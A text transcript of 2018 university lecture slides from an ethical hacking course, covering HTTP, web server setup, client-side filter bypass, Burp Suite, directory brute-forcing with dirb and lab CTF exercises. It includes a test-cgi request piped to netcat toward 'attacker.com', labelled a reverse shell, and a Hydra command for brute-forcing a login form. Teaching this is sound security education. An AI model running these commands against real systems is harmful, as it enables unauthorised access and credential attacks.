inf5290-2018-l05-web hacking 1.ppt - uio.no · • flash objects (swf) all additional content have...
TRANSCRIPT
IN5290 Ethical Hacking
Lecture 4: Web hacking 1, Client side bypass, Tampering data, Brute-forcing
Universitetet i OsloLaszlo Erdödi
IN5290 2018 L05 – Web hacking 1. 2
Lecture Overview
• Summary - how web sites work• HTTP protocol• Client side – server side actions• Accessing hidden contents• Modifying client side data• Brute-forcing forms, directories• Web parameter tampering
IN5290 2018 L05 – Web hacking 1. 3
Hypertext Transfer Protocol (HTTP)
HTTP is the protocol forweb communication.Currently version 1.0, 1.1and 2.0 are in use (2.0exits since 2015, almostall browsers support it bynow). HTTP is used in aclient – server model. Theclient sends a requestand receives answer fromthe server.
Client Server
Request
Request
Response
Response
IN5290 2018 L05 – Web hacking 1. 4
Hypertext Transfer Protocol (HTTP)
Each request and response consist of a header and abody. The header contains all the necessary and additionalinformation for the HTTP protocol.Request:• The protocol version• The requested file• The webmethod (see later)• The host nameResponse:• The web answer (in response)• The date• The content type
ClientRequest header
Request body
Response header
Response body
Server
IN5290 2018 L05 – Web hacking 1. 5
HTTP response splittingHTTP response splitting is anold vulnerability (still appearsin 2018). In case ofinappropriate validation of therequests, the client canprovide misleading input (twonew lines in the headerindicates the end of theheader). The attacker canforce the server to cache awrong server answer.
Request headerFake bodyFake header
Request body
Response header
Response body
Response header
Response body
IN5290 2018 L05 – Web hacking 1. 6
Hypertext Transfer Protocol (HTTP)
HTTP operates with several web methods. The main methods in use:• GET - to download data• POST - to send data (e.g. I posted something on facebook )Other methods in use:• HEAD – to obtain the HTTP header• PUT – to place content on the server (e.g. restful services)Further existing methods:DELETE (to remove content), TRACE, DEBUG, OPTIONS (to see the available webmethod list)
IN5290 2018 L05 – Web hacking 1. 7
Hypertext Transfer Protocol – telnet
IN5290 2018 L05 – Web hacking 1. 8
Hypertext Transfer Protocol with browserThe web communication is basically done by the web browsers. Thebrowsers can send optional values, such as content encoding, browsertype, etc.
IN5290 2018 L05 – Web hacking 1. 9
Hypertext Transfer Protocol web answers (Http status codes)
2xx: Success200: OK204: No content
3xx: Redirection301: Moved permanently302: Moved temporarily304: Not modified305: Use proxy308: Permanent redirect
4xx: Client error400: Bad request403: Forbidden404: File not found405: Method not allowed408: Request timeout
5xx: Server error500: Internal server error502: Bad gateway504: Gateway timeout505: Http version not supported
IN5290 2018 L05 – Web hacking 1. 10
HTTP PUT method – upload file
PUT method wasused to place andupdate websitecontent before ftp. Ifit is enabled for afolder and the folderhas permission towrite then theattacker can takeadvantage of thatvulnerability andupload arbitrary file.
IN5290 2018 L05 – Web hacking 1. 11
Accessing a webpageClient side Server side
Operating system
Browser
Html processingJavascript executionFlash execution
Operating system
Web server app FTP Otherservices
Server sideScripting engine
CMS
HTTP request
HTTP response
DB request
DB response
IN5290 2018 L05 – Web hacking 1. 12
Webserver types and configuration
Web server types and applications:• Apache• Internet Information Service (IIS, Microsoft)• Nginx• Lighttpd• GWS (Google)• othersThe web server is an application that is running under an OS. The userthat runs the web server should have the least privileges. Never run aweb server as a root! The webserver user has access to its own folder(webroot, e.g. /var/www, c:/inetpub, etc.) and the logging directory.
IN5290 2018 L05 – Web hacking 1. 13
Webserver configuration
The webserver configurationfile contains almost all theserver settings. The serverside script settings (e.g.where’s the php binary), theindex file extensions (inwhich order should thedefault page be considered,e.g: 1.index.php,2.index.htm), default errormessages (404 File notfound page) have to beplaced inside the conf file.
apache2.conf example
IN5290 2018 L05 – Web hacking 1. 14
Webserver configuration (.htaccess)
An .htaccess file is a way to configure the details of yourwebsite without altering the server config files.Main functions:• Mod_Rewrite (is a very powerful and sophisticated module which
provides a way to do URL manipulations)• Authentication (require a password to access certain sections of the
webpage)• Custom error pages (e.g. for 400 Bad request, 404 File not found,
500 Internal Server Error)• Mime types (add extra application files, e.g. special audio)• Server Side Includes (for update common scripts of web pages)
IN5290 2018 L05 – Web hacking 1. 15
Client side – How the browser process the htmlWhen the browser downloads the html file it is processed.The html can contain additional files:• Pictures (usually: png, jpg, gif)• Stylesheets (xss)• Javascript codes• Flash objects (swf)
All additional content have an access address (local orglobal). During the processing all the additional content willbe retrieved from the server with a separate web request.
IN5290 2018 L05 – Web hacking 1. 16
Tamper Data – Firefox addon
Tamper Data is a Firefox addon that is able to show all packetscrossing the browser with their details.
The main function is to view and modify the http/https header andPOST data. Unfortunately Firefox Quantum does not support it, butthere are other alternatives.
IN5290 2018 L05 – Web hacking 1. 17
Client side – How the browser process the htmlThe uio.no’s index.html contains several pictures,stylesheets and javascript code. The browser downloads allstep by step.
IN5290 2018 L05 – Web hacking 1. 18
Client side code
Html example from uio.no:
Style sheets example from uio.no:
Reference to a picture
Javascript inserted
Reference to javascript
IN5290 2018 L05 – Web hacking 1. 19
Javascript
Alongside HTML and CSS, JavaScript is one of the three coretechnologies of the World Wide Web. JavaScript enablesinteractive web pages and thus is an essential part of webapplications. The vast majority of websites use it, and all major webbrowsers have a dedicated JavaScript engine to execute it. As a multi-paradigm language, JavaScript supports event-driven, functional,and imperative (including object-oriented and prototype-based) programming styles. It has an API for working with text, arrays,dates, regular expressions, and basic manipulation of the DOM, butthe language itself does not include any I/O, such as networking,storage, or graphics facilities, relying for these upon the hostenvironment in which it is embedded.Example:<script>alert(‘Hi! I’m the Javascript Engine!’);</script>
IN5290 2018 L05 – Web hacking 1. 20
Flash
Flash is a platform for viewing multimedia contents, executing richInternet applications, and streaming audio and video. It can beembedded to web sites.Swf source example:
Flash code example:
Embedding flash object:
IN5290 2018 L05 – Web hacking 1. 21
Server side scripts
Server side scripts are executed on the server side. Manylanguages exist: php, perl, ruby, java, asp, etc. After theexecution a static html is generated and that is sent to theclient.
Php examples (php to html):<?php Print(‘<h1>Hello John!</h1>’); ?> -> <h1>Hello John!</h1>
<?php $result = mysql_query(“Select name from users where id=115”);$name = mysql_fetch_array($result);Print(‘<h1>Hello ‘.$name.’!</h1>’); ?> -> <h1>Hello John!</h1>
IN5290 2018 L05 – Web hacking 1. 22
Content Management Systems (CMS)
CMS are designed to create and modify the content of Webpages easily. The feature of CMS includes Web-basedpublishing, format management, history editing and versioncontrol, indexing, search, and retrieval. Typical CMS:• Joomla• Drupal• WordPressIf a vulnerability of CMS appears millions of websites canbe vulnerable suddenly.
IN5290 2018 L05 – Web hacking 1. 23
Start compromising a website
• First use it in a normal way (find the linked subsites,contents, input fields)
• Decide whether it is a simple static site or it has complexdynamic content (server side scripts, database behind)
• Try to find not intended content (comments in sourcecode
• Try to find hidden content without link (factory defaultfolders, user folders, configuration files)
• Try to obtain as much info as it is possible (informationdisclosures)
• Force the site to error (invalid inputs) and see the result
IN5290 2018 L05 – Web hacking 1. 24
Information disclosure
Example1: Find the hidden information (flag) on the following site: http://193.225.218.118/ctf/flag1
Example2: Find the hidden information (flag) on the following site: http://193.225.218.118/cybersmart/info2
IN5290 2018 L05 – Web hacking 1. 25
Prohibited content for search engines -robots.txtRobots.txt is a file that has to be placed in the webroot folder.Search engine robots read the file and process all thedisallowed entities. On the other hand it is an informationdisclosure. It also means that the listed entities exist.
IN5290 2018 L05 – Web hacking 1. 26
Dangerous default scripts: e.g. cgi-bin/test-cgiCgi-bin is a protocol to execute programs through apacheweb server. Test-cgi is a default file. The current directorycontent can be listed with it:GET /cgi-bin/test-cgi?*The root directory:GET /cgi-bin/test-cgi?/*Execute command with pipe (reverse shell):"GET /cgi-bin/test-cgi?/*" | nc attacker.com 80
IN5290 2018 L05 – Web hacking 1. 27
Directory brute-force / dirb
Different web servers use different default folders anddefault files. Dirb has collections of typical webserverrelated folder names.
IN5290 2018 L05 – Web hacking 1. 28
Directory brute-force / dirb
Dirb also has unified dictionaries (big.txt, common.txt, etc.
Dirb brute-forces the folders and files using the dictionaries.Example: Use dirb to find hidden content onhttp://193.225.218.118
IN5290 2018 L05 – Web hacking 1. 29
Client side filtering
Input filtering can be done on the client side. Client sideinput filtering is not input validation! Any data on the clientside can be modified (it’s my browser I can decide whatdata will be sent out). Typical input filtering:• Form elements with restrictions (max length of input,
restriction for special characters, only special characters are allowed, predefined input option e.g. radiobutton, combo)
• Javascript filtering (the javascript is running on client side, more complex validation can be done)
Client side filtering can be bypassed easily, that practically means no additional security
IN5290 2018 L05 – Web hacking 1. 30
Web developer extension
Web developer extension provides several features tomodify the client side appearance. It can modify the formelements, disable javascript, remove validations, etc.
Example: Find the flag on that site: http://193.225.218.118/ctf/flag4Use the web developer extension!
IN5290 2018 L05 – Web hacking 1. 31
Tamper data – modifying outgoing traffic
Tamper data is also for modifying the outgoing traffic. Byclicking on the start tamper button we can intercept thetraffic and modify the outgoing requests.
IN5290 2018 L05 – Web hacking 1. 32
Chrome postman
Postman interceptorcan set customheaders (includingcookies) and viewcookies already seton the domain.
IN5290 2018 L05 – Web hacking 1. 33
Burpsuite
Burp Suite is a tool for testing Web application security.It provides a proxyserver, and severalfeatures to smart-alterthe web traffic. Forexample every packetcan be resent by therepeater module andedited before at bytelevel. Any client sidevalidation can bebypassed with Burp.
IN5290 2018 L05 – Web hacking 1. 34
Brute force with hydra
Hydra can be used for http brute-forcing as well. Similarlyto the previously discussed protocols the username(username file) and the password (password file) have tobe provided. Contrary to the previous cases Hydra needs akeyword to identify negative answers (reverse brute-force).Example:hydra -l username -P passwordfile url.to.bf http-post-form"/portal/xlogin/:ed=^USER^&pw=^PASS^:F=Invalid"
Practice example: Find valid usernames for the form here:http://193.225.218.118/hydra.php
End of lecture
INF5290 2018 35L05 – Web hacking 1.